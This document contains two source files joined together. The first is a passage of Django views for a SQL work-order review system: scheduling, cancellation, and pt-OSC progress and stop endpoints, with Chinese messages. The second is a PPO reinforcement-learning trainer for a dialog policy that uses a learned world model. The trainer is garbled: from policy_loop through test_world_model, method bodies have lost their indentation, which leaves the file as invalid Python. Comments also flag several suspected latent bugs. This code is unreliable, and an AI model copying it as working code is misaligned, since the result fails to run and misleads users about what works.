        return render(request, 'error.html', context)
    workflowDetail = SqlWorkflow.objects.get(id=workflowId)
    if can_timingtask(request.user, workflowId) is False:
        context = {'errMsg': '你无权操作当前工单!'}
        return render(request, 'error.html', context)
    # block critical/high-risk DDL if the regex is configured
    if SysConfig().sys_config.get('critical_ddl_regex', '') != '':
        if InceptionDao().criticalDDL(workflowDetail.sql_content):
            context = {'errMsg': '高危语句,禁止执行!'}
            return render(request, 'error.html', context)
    run_date = datetime.datetime.strptime(run_date, "%Y-%m-%d %H:%M:%S")
    url = getDetailUrl(request, workflowId)
    job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
    # transaction keeps status change and job registration consistent
    try:
        with transaction.atomic():
            # switch the order status to 'timingtask'
            workflowDetail.status = Const.workflowStatus['timingtask']
            workflowDetail.save()
            # register the scheduled job
            add_sqlcronjob(job_id, run_date, workflowId, url)
            # add a work-order log entry
            audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
                                                       workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
            workflowOb.add_workflow_log(audit_id=audit_id,
                                        operation_type=4,
                                        operation_type_desc='定时执行',
                                        operation_info="定时执行时间:{}".format(run_date),
                                        operator=request.user.username,
                                        operator_display=request.user.display
                                        )
    except Exception as msg:
        logger.error(traceback.format_exc())
        context = {'errMsg': msg}
        return render(request, 'error.html', context)
    return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# Terminate / abort a work order
def cancel(request):
    """Abort a work order: cancel or reject it through the audit workflow,
    remove any scheduled job, and mark the order aborted."""
    workflowId = request.POST['workflowid']
    if workflowId == '' or workflowId is None:
        context = {'errMsg': 'workflowId参数为空.'}
        return render(request, 'error.html', context)
    workflowId = int(workflowId)
    workflowDetail = SqlWorkflow.objects.get(id=workflowId)
    audit_remark = request.POST.get('cancel_remark')
    if audit_remark is None:
        context = {'errMsg': '终止原因不能为空'}
        return render(request, 'error.html', context)
    user = request.user
    if can_cancel(request.user, workflowId) is False:
        context = {'errMsg': '你无权操作当前工单!'}
        return render(request, 'error.html', context)
    # transaction keeps audit, job and status changes consistent
    try:
        with transaction.atomic():
            # fetch the audit record for the workflow-engine calls below
            audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
                                                       workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
            # only orders still pending manual review go through the
            # workflow engine; the rest just get a log entry
            if workflowDetail.status != Const.workflowStatus['manreviewing']:
                # log entry only: submitter cancels, reviewer rejects
                if user.username == workflowDetail.engineer:
                    workflowOb.add_workflow_log(audit_id=audit_id,
                                                operation_type=3,
                                                operation_type_desc='取消执行',
                                                operation_info="取消原因:{}".format(audit_remark),
                                                operator=request.user.username,
                                                operator_display=request.user.display
                                                )
                else:
                    workflowOb.add_workflow_log(audit_id=audit_id,
                                                operation_type=2,
                                                operation_type_desc='审批不通过',
                                                operation_info="审批备注:{}".format(audit_remark),
                                                operator=request.user.username,
                                                operator_display=request.user.display
                                                )
            else:
                if user.username == workflowDetail.engineer:
                    workflowOb.auditworkflow(request, audit_id,
                                             WorkflowDict.workflow_status['audit_abort'],
                                             user.username, audit_remark)
                # non-submitters must hold review permission
                elif user.has_perm('sql.sql_review'):
                    workflowOb.auditworkflow(request, audit_id,
                                             WorkflowDict.workflow_status['audit_reject'],
                                             user.username, audit_remark)
                else:
                    raise PermissionDenied
            # drop the scheduled cron job, if any
            if workflowDetail.status == Const.workflowStatus['timingtask']:
                job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
                del_sqlcronjob(job_id)
            # mark the order as manually aborted
            workflowDetail.status = Const.workflowStatus['abort']
            workflowDetail.audit_remark = audit_remark
            workflowDetail.save()
    except Exception as msg:
        logger.error(traceback.format_exc())
        context = {'errMsg': msg}
        return render(request, 'error.html', context)
    return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
def getSqlSHA1(workflowId):
    """Load review_content for a work order and build {row_id: sqlSHA1}.

    Rows with a non-empty sqlSHA1 were executed via pt-OSC; when any are
    found the mapping is cached in the module-level sqlSHA1_cache (no
    expiry — OSC work orders are rare).
    """
    detail = get_object_or_404(SqlWorkflow, pk=workflowId)
    # review_content is stored as a JSON string: decode it into row lists
    review_rows = json.loads(detail.review_content)
    dictSHA1 = {}
    for row_id, row in enumerate(review_rows, start=1):
        sha1 = row[10]
        if sha1 != '':
            dictSHA1[row_id] = sha1
    if dictSHA1 != {}:
        sqlSHA1_cache[workflowId] = dictSHA1
    return dictSHA1
def getOscPercent(request):
    """Return pt-OSC progress (percent / time remaining) for one SQL row as JSON."""
    workflowId = request.POST['workflowid']
    sqlID = request.POST['sqlID']
    if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
        context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    workflowId = int(workflowId)
    sqlID = int(sqlID)
    dictSHA1 = {}
    # try the module-level SHA1 cache first, fall back to the database
    if workflowId in sqlSHA1_cache:
        dictSHA1 = sqlSHA1_cache[workflowId]
        # cachehit = "已命中"
    else:
        dictSHA1 = getSqlSHA1(workflowId)
    if dictSHA1 != {} and sqlID in dictSHA1:
        sqlSHA1 = dictSHA1[sqlID]
        try:
            # got a SHA1 value -> ask Inception for live progress
            result = InceptionDao().getOscPercent(sqlSHA1)
        except Exception as msg:
            logger.error(traceback.format_exc())
            result = {'status': 1, 'msg': msg, 'data': ''}
            return HttpResponse(json.dumps(result), content_type='application/json')
        if result["status"] == 0:
            # got a live progress value
            pctResult = result
        else:
            # result["status"] == 1: no live progress — compare against
            # workflow.execute_result to tell "finished" from "not started"
            execute_result = SqlWorkflow.objects.get(id=workflowId).execute_result
            try:
                listExecResult = json.loads(execute_result)
            except ValueError:
                listExecResult = execute_result
            # NOTE(review): `>= sqlID - 1` admits an index one past the end,
            # and when this condition is False pctResult stays unbound —
            # both look like latent bugs; confirm before changing.
            if type(listExecResult) == list and len(listExecResult) >= sqlID - 1:
                if dictSHA1[sqlID] in listExecResult[sqlID - 1][10]:
                    # already finished: report 100%
                    pctResult = {"status": 0, "msg": "ok", "data": {"percent": 100, "timeRemained": ""}}
                else:
                    # the previous DML may still be running, or this row has
                    # not started yet (status 4 from Inception) — the front
                    # end is expected to retry
                    pctResult = {"status": -3, "msg": "进度未知", "data": {"percent": -100, "timeRemained": ""}}
    elif dictSHA1 != {} and sqlID not in dictSHA1:
        pctResult = {"status": 4, "msg": "该行SQL不是由pt-OSC执行的", "data": ""}
    else:
        pctResult = {"status": -2, "msg": "整个工单不由pt-OSC执行", "data": ""}
    return HttpResponse(json.dumps(pctResult), content_type='application/json')
def getWorkflowStatus(request):
    """Return the current status of one workflow as a JSON response."""
    workflowId = request.POST['workflowid']
    if workflowId == '' or workflowId is None:
        context = {"status": -1, 'msg': 'workflowId参数为空.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    workflow = get_object_or_404(SqlWorkflow, pk=int(workflowId))
    payload = {"status": workflow.status, "msg": "", "data": ""}
    return HttpResponse(json.dumps(payload), content_type='application/json')
def stopOscProgress(request):
    """Terminate the running pt-OSC process for one SQL statement.

    Server-side double check: the workflow must currently be executing and the
    logged-in user must be one of its reviewers, so a forged or replayed client
    request cannot bypass the UI.
    """
    workflowId = request.POST['workflowid']
    sqlID = request.POST['sqlID']
    if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
        context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    user = request.user
    workflowDetail = SqlWorkflow.objects.get(id=workflowId)
    try:
        reviewMan = json.loads(workflowDetail.audit_auth_groups)
    except ValueError:
        # audit_auth_groups is a plain string, not JSON; wrap it as one reviewer
        reviewMan = (workflowDetail.audit_auth_groups,)
    # the workflow must be executing and the user must be a reviewer
    if workflowDetail.status != Const.workflowStatus['executing']:
        context = {"status": -1, "msg": '当前工单状态不是"执行中",请刷新当前页面!', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    if user.username is None or user.username not in reviewMan:
        context = {"status": -1, 'msg': '当前登录用户不是审核人,请重新登录.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    workflowId = int(workflowId)
    sqlID = int(sqlID)
    if workflowId in sqlSHA1_cache:
        dictSHA1 = sqlSHA1_cache[workflowId]
    else:
        dictSHA1 = getSqlSHA1(workflowId)
    if dictSHA1 != {} and sqlID in dictSHA1:
        sqlSHA1 = dictSHA1[sqlID]
        try:
            optResult = InceptionDao().stopOscProgress(sqlSHA1)
        except Exception as msg:
            logger.error(traceback.format_exc())
            # BUG FIX: json.dumps cannot serialize an Exception instance; use str()
            optResult = {'status': 1, 'msg': str(msg), 'data': ''}
            return HttpResponse(json.dumps(optResult), content_type='application/json')
    else:
        optResult = {"status": 4, "msg": "不是由pt-OSC执行的", "data": ""}
    return HttpResponse(json.dumps(optResult), content_type='application/json')
|
vanilla_ppo.py | # -*- coding: utf-8 -*-
import os
import numpy as np
import logging
import pickle
import torch
import torch.nn as nn
from torch import optim
from torch import multiprocessing as mp
from rlmodule import MultiDiscretePolicy, Value, Memory, UserAction2, VanillaTransition
# from estimator import RewardEstimator
from utils import state_vectorize, to_device, usr_state_vectorize
from metrics import Evaluator
# from copy import deepcopy
import random
from world_model import WorldModel
# Place all tensors/modules in this module on the GPU when CUDA is available.
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def sampler(pid, queue, evt, env, policy, batchsz):
    """
    This is a sampler function, and it will be called by multiprocess.Process to sample data from environment by multiple
    processes.
    :param pid: process id
    :param queue: multiprocessing.Queue, to collect sampled data
    :param evt: multiprocessing.Event, to keep the process alive
    :param env: environment instance
    :param policy: policy network, to generate action from current policy
    :param batchsz: total sampled items
    :return:
    """
    buff = Memory(VanillaTransition)
    # separate buffer for user-simulator-side data (used to train the world model)
    user_buff = Memory(UserAction2)

    # we need to sample batchsz of (state, action, next_state, reward, mask)
    # each trajectory contains `trajectory_len` num of items, so we only need to sample
    # `batchsz//trajectory_len` num of trajectory totally
    # the final sampled number may be larger than batchsz.
    sampled_num = 0
    sampled_traj_num = 0
    traj_len = 40
    real_traj_len = 0

    while sampled_num < batchsz:
        # for each trajectory, we reset the env and get initial state
        s = env.reset()
        for t in range(traj_len):
            # [s_dim] => [a_dim]
            s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db))
            a = policy.select_action(s_vec.to(device=DEVICE)).cpu()
            # interact with env
            next_s, done, info = env.step(s, a)
            # a flag indicates ending or not
            mask = 0 if done else 1
            # manual reward calculations
            reward = env.get_reward()
            # get reward compared to demonstrations
            next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db))
            # save to queue
            buff.push(s_vec.numpy(), a.numpy(), reward, mask, next_s_vec.numpy())
            # vectorize the user-simulator state for world-model training
            user_state_vec = usr_state_vectorize(info['wm_state']['user_goal'],
                                                 list(info['wm_state']['history']['sys'].keys()) +
                                                 list(info['wm_state']['sys_action'].keys()),
                                                 env.cfg)
            user_buff.push(info['wm_state'], user_state_vec, info['wm_usr_a_vec'].numpy(), info['wm_usr_terminal'],
                           env.goal, env.agenda)
            # update per step
            s = next_s
            real_traj_len = t
            if done:
                break

        # this is end of one trajectory
        # NOTE(review): real_traj_len is the 0-based step index, so this
        # undercounts each trajectory by one transition — confirm intended.
        sampled_num += real_traj_len
        sampled_traj_num += 1
        # t indicates the valid trajectory length

    # this is end of sampling all batchsz of items.
    # when sampling is over, push all buff data into queue
    queue.put([pid, buff, user_buff])
    # keep this process (and the tensors it put on the queue) alive until the
    # parent has consumed everything and sets the event
    evt.wait()
class PPO(object):
    def __init__(self, env_cls, args, manager, cfg, process_num, pre=False, pre_irl=False,
                 infer=False):
        """
        :param env_cls: env class or function, not instance, as we need to create several instance in class.
        :param args: parsed command-line namespace (sim_ratio, model_horizon,
                     batchsz, lr_rl, gamma, epsilon, tau, save_dir, ... are read)
        :param manager: dataset manager; provides create_dataset_rl() in pretrain mode
        :param cfg: config object forwarded to the policy/value networks
        :param process_num: process number
        :param pre: set to pretrain mode
        :param pre_irl: forwarded to the (currently disabled) reward estimator
        :param infer: set to test mode
        """
        self.ratio = args.sim_ratio
        self.model_horizon = args.model_horizon
        self.process_num = process_num

        # initialize envs for each process
        self.env_list = []
        for _ in range(process_num):
            self.env_list.append(env_cls())

        # construct policy and value network
        self.policy = MultiDiscretePolicy(cfg).to(device=DEVICE)
        self.value = Value(cfg).to(device=DEVICE)

        if pre:
            # behavioral-cloning pretrain mode: load supervised datasets
            self.print_per_batch = args.print_per_batch
            from dbquery import DBQuery
            db = DBQuery(args.data_dir)
            self.data_train = manager.create_dataset_rl('train', args.batchsz, cfg, db)
            self.data_valid = manager.create_dataset_rl('valid', args.batchsz, cfg, db)
            self.data_test = manager.create_dataset_rl('test', args.batchsz, cfg, db)
            self.multi_entropy_loss = nn.MultiLabelSoftMarginLoss()
        else:
            # RL mode: evaluator + learned world model (IRL rewarder disabled)
            # self.rewarder = RewardEstimator(args, manager, cfg, pretrain=pre_irl, inference=infer)
            self.evaluator = Evaluator(args.data_dir, cfg)
            self.world_model = WorldModel(args, cfg, manager)

        self.save_dir = args.save_dir
        self.save_per_epoch = args.save_per_epoch
        self.optim_batchsz = args.batchsz
        self.update_round = args.update_round
        # networks start in eval mode; update()/imitating() toggle train mode
        self.policy.eval()
        self.value.eval()
        self.gamma = args.gamma
        self.epsilon = args.epsilon
        self.tau = args.tau
        self.policy_optim = optim.RMSprop(self.policy.parameters(), lr=args.lr_rl)
        self.value_optim = optim.Adam(self.value.parameters(), lr=args.lr_rl)
def policy_loop(self, data):
s, target_a = to_device(data)
a_weights = self.policy(s)
loss_a = self.multi_entropy_loss(a_weights, target_a)
return loss_a
def imitating(self, epoch):
"""
pretrain the policy by simple imitation learning (behavioral cloning)
"""
self.policy.train()
a_loss = 0.
for i, data in enumerate(self.data_train):
self.policy_optim.zero_grad()
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
loss_a.backward()
self.policy_optim.step()
if (i + 1) % self.print_per_batch == 0:
a_loss /= self.print_per_batch
logging.debug('<<dialog policy>> epoch {}, iter {}, loss_a:{}'.format(epoch, i, a_loss))
a_loss = 0.
if (epoch + 1) % self.save_per_epoch == 0:
self.save(self.save_dir, epoch, True)
self.policy.eval()
def imit_test(self, epoch, best):
"""
provide an unbiased evaluation of the policy fit on the training dataset
"""
a_loss = 0.
for i, data in enumerate(self.data_valid):
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
a_loss /= len(self.data_valid)
logging.debug('<<dialog policy>> validation, epoch {}, loss_a:{}'.format(epoch, a_loss))
if a_loss < best:
logging.info('<<dialog policy>> best model saved')
best = a_loss
self.save(self.save_dir, 'best', True)
a_loss = 0.
for i, data in enumerate(self.data_test):
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
a_loss /= len(self.data_test)
logging.debug('<<dialog policy>> test, epoch {}, loss_a:{}'.format(epoch, a_loss))
return best
"""
def imit_value(self, epoch, batchsz, best):
self.value.train()
batch, _ = self.sample(batchsz)
s = torch.from_numpy(np.stack(batch.state)).to(device=DEVICE)
a = torch.from_numpy(np.stack(batch.action)).to(device=DEVICE)
next_s = torch.from_numpy(np.stack(batch.next_state)).to(device=DEVICE)
mask = torch.Tensor(np.stack(batch.mask)).to(device=DEVICE)
batchsz = s.size(0)
v = self.value(s).squeeze(-1).detach()
log_pi_old_sa = self.policy.get_log_prob(s, a).detach()
# r = self.rewarder.estimate(s, a, next_s, log_pi_old_sa).detach()
# TODO: handle reward here
A_sa, v_target = self.est_adv(r, v, mask)
value_loss = 0.
for i in range(self.update_round):
perm = torch.randperm(batchsz)
v_target_shuf, s_shuf = v_target[perm], s[perm]
optim_chunk_num = int(np.ceil(batchsz / self.optim_batchsz))
v_target_shuf, s_shuf = torch.chunk(v_target_shuf, optim_chunk_num), torch.chunk(s_shuf, optim_chunk_num)
value_loss = 0.
for v_target_b, s_b in zip(v_target_shuf, s_shuf):
self.value_optim.zero_grad()
v_b = self.value(s_b).squeeze(-1)
loss = (v_b - v_target_b).pow(2).mean()
value_loss += loss.item()
loss.backward()
self.value_optim.step()
value_loss /= optim_chunk_num
logging.debug('<<dialog policy>> epoch {}, iteration {}, loss {}'.format(epoch, i, value_loss))
if value_loss < best:
logging.info('<<dialog policy>> best model saved')
best = value_loss
self.save(self.save_dir, 'best', True)
if (epoch + 1) % self.save_per_epoch == 0:
self.save(self.save_dir, epoch, True)
self.value.eval()
return best
"""
"""
def train_irl(self, epoch, batchsz):
batch, _ = self.sample(batchsz)
self.rewarder.train_irl(batch, epoch)
def test_irl(self, epoch, batchsz, best):
batch, _ = self.sample(batchsz)
best = self.rewarder.test_irl(batch, epoch, best)
return best
"""
@staticmethod
def _prepare_world_model_data(user_batch):
user_state_vec = torch.from_numpy(np.stack(user_batch.state_vec)).float().to(DEVICE)
user_act_vec = torch.from_numpy(np.stack(user_batch.action_vec)).float().to(DEVICE)
user_terminal_vec = torch.from_numpy(np.stack(user_batch.terminal)).unsqueeze(-1).float().to(DEVICE)
return [user_state_vec, user_act_vec, user_terminal_vec]
def train_world_model(self, epoch, batchsz):
_, batch = self.sample(batchsz)
self.world_model.train(self._prepare_world_model_data(batch), epoch)
def test_world_model(self, epoch, batchsz, best):
_, batch = self.sample(batchsz)
best = self.world_model.test(self._prepare_world_model_data(batch), epoch, best)
return best
    def est_adv(self, r, v, mask):
        """
        we save a trajectory in continuous space and it reaches the ending of current trajectory when mask=0.
        :param r: reward, Tensor, [b]
        :param v: estimated value, Tensor, [b]
        :param mask: indicates ending for 0 otherwise 1, Tensor, [b]
        :return: A(s, a), V-target(s), both Tensor
        """
        batchsz = v.size(0)

        # v_target is worked out by Bellman equation.
        v_target = torch.Tensor(batchsz).to(device=DEVICE)
        delta = torch.Tensor(batchsz).to(device=DEVICE)
        A_sa = torch.Tensor(batchsz).to(device=DEVICE)

        # running values carried backwards over the (concatenated) trajectories;
        # they are implicitly reset at trajectory boundaries because mask[t] == 0
        # zeroes every carry-over term
        prev_v_target = 0
        prev_v = 0
        prev_A_sa = 0
        for t in reversed(range(batchsz)):
            # mask here indicates a end of trajectory
            # this value will be treated as the target value of value network.
            # mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.
            # formula: V(s_t) = r_t + gamma * V(s_t+1)
            v_target[t] = r[t] + self.gamma * prev_v_target * mask[t]

            # please refer to : https://arxiv.org/abs/1506.02438
            # for generalized adavantage estimation
            # formula: delta(s_t) = r_t + gamma * V(s_t+1) - V(s_t)
            delta[t] = r[t] + self.gamma * prev_v * mask[t] - v[t]

            # formula: A(s, a) = delta(s_t) + gamma * lamda * A(s_t+1, a_t+1)
            # here use symbol tau as lambda, but original paper uses symbol lambda.
            A_sa[t] = delta[t] + self.gamma * self.tau * prev_A_sa * mask[t]

            # update previous
            prev_v_target = v_target[t]
            prev_v = v[t]
            prev_A_sa = A_sa[t]

        # normalize A_sa
        # NOTE(review): A_sa.std() is NaN for batchsz == 1 — confirm batches
        # always contain more than one transition.
        A_sa = (A_sa - A_sa.mean()) / A_sa.std()

        return A_sa, v_target
    def update(self, batchsz, epoch, best=None):
        """
        firstly sample batchsz items and then perform optimize algorithms.
        :param batchsz: number of real transitions to sample
        :param epoch: current epoch index (used for logging/checkpointing)
        :param best: list of best metrics so far; when given, run in
                     validation mode (no gradient updates) and return it
        :return: updated *best* in validation mode, otherwise None
        """
        # best is None => training mode with backward passes
        backward = True if best is None else False
        if backward:
            self.policy.train()
            self.value.train()

        # 1. sample data asynchronously
        real_batch, user_batch = self.sample(batchsz)

        # data in batch is : batch.state: ([1, s_dim], [1, s_dim]...)
        # batch.action: ([1, a_dim], [1, a_dim]...)
        # batch.reward/ batch.mask: ([1], [1]...)
        real_s, real_a, real_r, real_mask, real_next_s = [torch.from_numpy(np.stack(item)).to(device=DEVICE) for item in
                                                          real_batch]
        real_batchsz = real_s.size(0)

        # 2. update reward estimator (disabled)
        # real_inputs = (real_s, real_a, real_next_s)
        # if backward:
        #     self.rewarder.update_irl(real_inputs, real_batchsz, epoch)
        # else:
        #     best[1] = self.rewarder.update_irl(real_inputs, real_batchsz, epoch, best[1])

        # update the world model (train in training mode, evaluate in validation)
        if backward:
            self.world_model.train(self._prepare_world_model_data(user_batch), epoch)
        else:
            best[3] = self.world_model.test(self._prepare_world_model_data(user_batch), epoch, best[3])

        # merge real trajectory and simulated trajectory
        if backward and self.ratio > 0.0:
            # sample with the world model
            # I-SEE
            sim_batch = self.sample_with_wm(int(np.ceil(batchsz * self.ratio)), user_batch)
            # DDQ style
            # sim_batch = self.sample_with_wm_complete(int(np.ceil(batchsz * self.ratio)))
            s, a, r, mask, next_s = [torch.from_numpy(np.stack(real_traj + sim_traj)).to(device=DEVICE)
                                     for real_traj, sim_traj in zip(real_batch, sim_batch)]
            batchsz = s.size(0)
        else:
            s, a, r, mask, next_s = real_s, real_a, real_r, real_mask, real_next_s
            batchsz = real_batchsz

        # 3. get estimated V(s) and PI_old(s, a)
        # actually, PI_old(s, a) can be saved when interacting with env, so as to save the time of one forward elapsed
        # v: [b, 1] => [b]
        v = self.value(s).squeeze(-1).detach()
        log_pi_old_sa = self.policy.get_log_prob(s, a).detach()
        A_sa, v_target = self.est_adv(r, v, mask)

        if backward:
            logging.debug('<<dialog policy>> epoch {}, reward {}'.format(epoch, r.mean().item()))
        else:
            # validation mode: only track the best mean reward and persist it
            reward = r.mean().item()
            logging.debug('<<dialog policy>> validation, epoch {}, reward {}'.format(epoch, reward))
            if reward > best[2]:
                logging.info('<<dialog policy>> best model saved')
                best[2] = reward
                self.save(self.save_dir, 'best', True)
                with open(self.save_dir + '/best.pkl', 'wb') as f:
                    pickle.dump(best, f)
            return best

        # 5. update dialog policy
        for i in range(self.update_round):
            # 1. shuffle current batch
            perm = torch.randperm(batchsz)
            # shuffle the variable for mutliple optimize
            v_target_shuf, A_sa_shuf, s_shuf, a_shuf, log_pi_old_sa_shuf = v_target[perm], A_sa[perm], s[perm], a[perm], \
                log_pi_old_sa[perm]

            # 2. get mini-batch for optimizing
            optim_chunk_num = int(np.ceil(batchsz / self.optim_batchsz))
            # chunk the optim_batch for total batch
            v_target_shuf, A_sa_shuf, s_shuf, a_shuf, log_pi_old_sa_shuf = torch.chunk(v_target_shuf, optim_chunk_num), \
                torch.chunk(A_sa_shuf, optim_chunk_num), \
                torch.chunk(s_shuf, optim_chunk_num), \
                torch.chunk(a_shuf, optim_chunk_num), \
                torch.chunk(log_pi_old_sa_shuf,
                            optim_chunk_num)

            # 3. iterate all mini-batch to optimize
            policy_loss, value_loss = 0., 0.
            for v_target_b, A_sa_b, s_b, a_b, log_pi_old_sa_b in zip(v_target_shuf, A_sa_shuf, s_shuf, a_shuf,
                                                                     log_pi_old_sa_shuf):
                # print('optim:', batchsz, v_target_b.size(), A_sa_b.size(), s_b.size(), a_b.size(), log_pi_old_sa_b.size())
                # 1. update value network (MSE against the Bellman target)
                self.value_optim.zero_grad()
                v_b = self.value(s_b).squeeze(-1)
                loss = (v_b - v_target_b).pow(2).mean()
                value_loss += loss.item()

                # backprop
                loss.backward()
                # nn.utils.clip_grad_norm(self.value.parameters(), 4)
                self.value_optim.step()

                # 2. update policy network by clipping
                self.policy_optim.zero_grad()
                # [b, 1]
                log_pi_sa = self.policy.get_log_prob(s_b, a_b)
                # ratio = exp(log_Pi(a|s) - log_Pi_old(a|s)) = Pi(a|s) / Pi_old(a|s)
                # we use log_pi for stability of numerical operation
                # [b, 1] => [b]
                ratio = (log_pi_sa - log_pi_old_sa_b).exp().squeeze(-1)
                surrogate1 = ratio * A_sa_b
                surrogate2 = torch.clamp(ratio, 1 - self.epsilon, 1 + self.epsilon) * A_sa_b
                # this is element-wise comparing.
                # we add negative symbol to convert gradient ascent to gradient descent
                surrogate = - torch.min(surrogate1, surrogate2).mean()
                policy_loss += surrogate.item()

                # backprop
                surrogate.backward()
                # gradient clipping, for stability
                torch.nn.utils.clip_grad_norm_(self.policy.parameters(), 10)
                # self.lock.acquire() # retain lock to update weights
                self.policy_optim.step()
                # self.lock.release() # release lock

            value_loss /= optim_chunk_num
            policy_loss /= optim_chunk_num
            logging.debug('<<dialog policy>> epoch {}, iteration {}, value, loss {}'.format(epoch, i, value_loss))
            logging.debug('<<dialog policy>> epoch {}, iteration {}, policy, loss {}'.format(epoch, i, policy_loss))

        if (epoch + 1) % self.save_per_epoch == 0:
            self.save(self.save_dir, epoch)
            with open(self.save_dir + '/' + str(epoch) + '.pkl', 'wb') as f:
                pickle.dump(best, f)
        self.policy.eval()
        self.value.eval()
    def sample_with_wm(self, batchsz, user_batch):
        """Generate simulated transitions by branching the learned world model
        from user states observed in *user_batch* (I-SEE style rollouts).

        Repeatedly picks a random non-terminal user state, rolls the current
        policy against a randomly chosen ensemble member for up to
        model_horizon steps, and accumulates at least *batchsz* transitions.
        """
        user_batchsz = len(user_batch.state_comp)
        sampled_num = 0
        # traj_len = 40
        buff = Memory(VanillaTransition)
        while sampled_num < batchsz:
            # sample a state from the user batch
            index = random.choice(range(user_batchsz))
            state, state_vec, user_act_vec, terminal, goal, agenda = \
                user_batch.state_comp[index], user_batch.state_vec[index], \
                user_batch.action_vec[index], user_batch.terminal[index], user_batch.goal[index], user_batch.agenda[
                    index]
            if terminal:
                # cannot branch from a finished dialog; resample
                continue
            self.world_model.set_goal_agenda(goal, agenda)
            s = self.world_model.set_state(state, torch.from_numpy(user_act_vec), terminal)
            # roll out against one randomly selected ensemble member
            self.world_model.pick_one(random.choice(range(self.world_model.ensemble_size)))
            for t in range(self.model_horizon):
                # [s_dim] => [a_dim]
                s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
                a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
                # interact with env
                next_s, done, info = self.world_model.step(s, a)
                r = self.world_model.get_reward()
                sampled_num += 1
                # a flag indicates ending or not
                mask = 0 if done or (t == (self.model_horizon - 1)) else 1
                # get reward compared to demonstrations
                next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
                # save to queue
                buff.push(s_vec.numpy(), a.numpy(), r, mask, next_s_vec.numpy())
                s = next_s
                if done:
                    break
        # deselect the ensemble member
        self.world_model.pick_one(None)
        return buff.get_batch()
    def sample_with_wm_complete(self, batchsz):
        """Generate simulated transitions with complete world-model rollouts
        from a fresh reset (DDQ style) instead of branching from real states."""
        sampled_num = 0
        sampled_traj_num = 0
        traj_len = 40
        buff = Memory(VanillaTransition)
        while sampled_num < batchsz:
            s = self.world_model.reset()
            # roll out against one randomly selected ensemble member
            self.world_model.pick_one(random.choice(range(self.world_model.ensemble_size)))
            for t in range(traj_len):
                s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
                a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
                # interact with env
                next_s, done, info = self.world_model.step(s, a)
                r = self.world_model.get_reward()
                sampled_num += 1
                # a flag indicates ending or not
                # NOTE(review): the cut-off compares against model_horizon even
                # though this loop runs to traj_len — confirm intended.
                mask = 0 if done or (t == (self.model_horizon - 1)) else 1
                # get reward compared to demonstrations
                next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
                # save to queue
                buff.push(s_vec.numpy(), a.numpy(), r, mask, next_s_vec.numpy())
                # update per step
                s = next_s
                if done:
                    break
            # this is end of one trajectory
            sampled_traj_num += 1
        self.world_model.pick_one(None)
        return buff.get_batch()
    def sample(self, batchsz):
        """
        Given batchsz number of task, the batchsz will be splited equally to each processes
        and when processes return, it merge all data and return
        :param batchsz: total number of transitions to collect across processes
        :return: (system-side batch, user-side batch) as returned by Memory.get_batch()
        """
        # batchsz will be splitted into each process,
        # final batchsz maybe larger than batchsz parameters
        process_batchsz = np.ceil(batchsz / self.process_num).astype(np.int32)
        # buffer to save all data
        queue = mp.Queue()

        # start processes for pid in range(1, processnum)
        # if processnum = 1, this part will be ignored.
        # when save tensor in Queue, the process should keep alive till Queue.get(),
        # please refer to : https://discuss.pytorch.org/t/using-torch-tensor-over-multiprocessing-queue-process-fails/2847
        # however still some problem on CUDA tensors on multiprocessing queue,
        # please refer to : https://discuss.pytorch.org/t/cuda-tensors-on-multiprocessing-queue/28626
        # so just transform tensors into numpy, then put them into queue.
        evt = mp.Event()
        processes = []
        for i in range(self.process_num):
            process_args = (i, queue, evt, self.env_list[i], self.policy, process_batchsz)
            processes.append(mp.Process(target=sampler, args=process_args))
        for p in processes:
            # set the process as daemon, and it will be killed once the main process is stoped.
            p.daemon = True
            p.start()

        # we need to get the first Memory object and then merge others Memory use its append function.
        pid0, buff0, user_buff0 = queue.get()
        for _ in range(1, self.process_num):
            pid, buff_, user_buff_ = queue.get()
            buff0.append(buff_)  # merge current Memory into buff0
            user_buff0.append(user_buff_)
        # all data consumed: release the workers blocked in evt.wait()
        evt.set()

        # now buff saves all the sampled data
        buff = buff0
        user_buff = user_buff0

        return buff.get_batch(), user_buff.get_batch()
    def evaluate(self):
        """Run 1000 seeded dialogs against the real environment and log the
        mean reward, turn count, match rate, inform recall/F1 and success
        rate. Prints per-session traces to stdout."""
        env = self.env_list[0]
        traj_len = 40
        reward_tot, turn_tot, inform_tot, match_tot, success_tot = [], [], [], [], []
        for seed in range(1000):
            s = env.reset(seed)
            print('seed', seed)
            print('goal', env.goal.domain_goals)
            print('usr', s['user_action'])
            turn = traj_len
            reward = []
            value = []
            mask = []
            for t in range(traj_len):
                s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db)).to(device=DEVICE)
                # mode with policy during evaluation
                a = self.policy.select_action(s_vec, False)
